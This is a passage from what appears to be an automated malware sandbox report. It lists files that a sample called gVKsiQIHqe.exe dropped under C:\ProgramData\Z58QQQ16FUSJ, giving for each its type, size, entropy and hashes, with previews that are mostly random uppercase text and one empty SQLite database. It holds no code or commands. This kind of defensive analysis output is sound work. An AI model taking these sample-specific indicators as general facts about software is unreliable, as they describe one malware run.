                                                                                                                                                                                                                                                                                    Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\UKFK6P

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\USRIEC

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\VAS26F

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                                                                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                                                                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                                                                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                                                                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\VKNG4E

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                                                                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                                                                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                                                                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                                                                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\WLN79ZCTR

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\XLFCJE

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7020597455120665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
                                                                                                                                                                                                                                                                                    MD5:47F4925C44B6916FE1BEE7FBB1ACF777
                                                                                                                                                                                                                                                                                    SHA1:D7BFAEF09A15A105540FC44D2C307778C0553CE5
                                                                                                                                                                                                                                                                                    SHA-256:62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
                                                                                                                                                                                                                                                                                    SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\YUAI5X

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                                                                    MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                                                                    SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                                                                    SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                                                                    SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\Z58GVK

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                                                                    MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                                                                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                                                                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                                                                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                                                                                                                                                                                                                    C:\ProgramData\Z58QQQ16FUSJ\Z5P8GD

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                                                                    MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                                                                    SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                                                                    SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                                                                    SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                                                                    Malicious:false
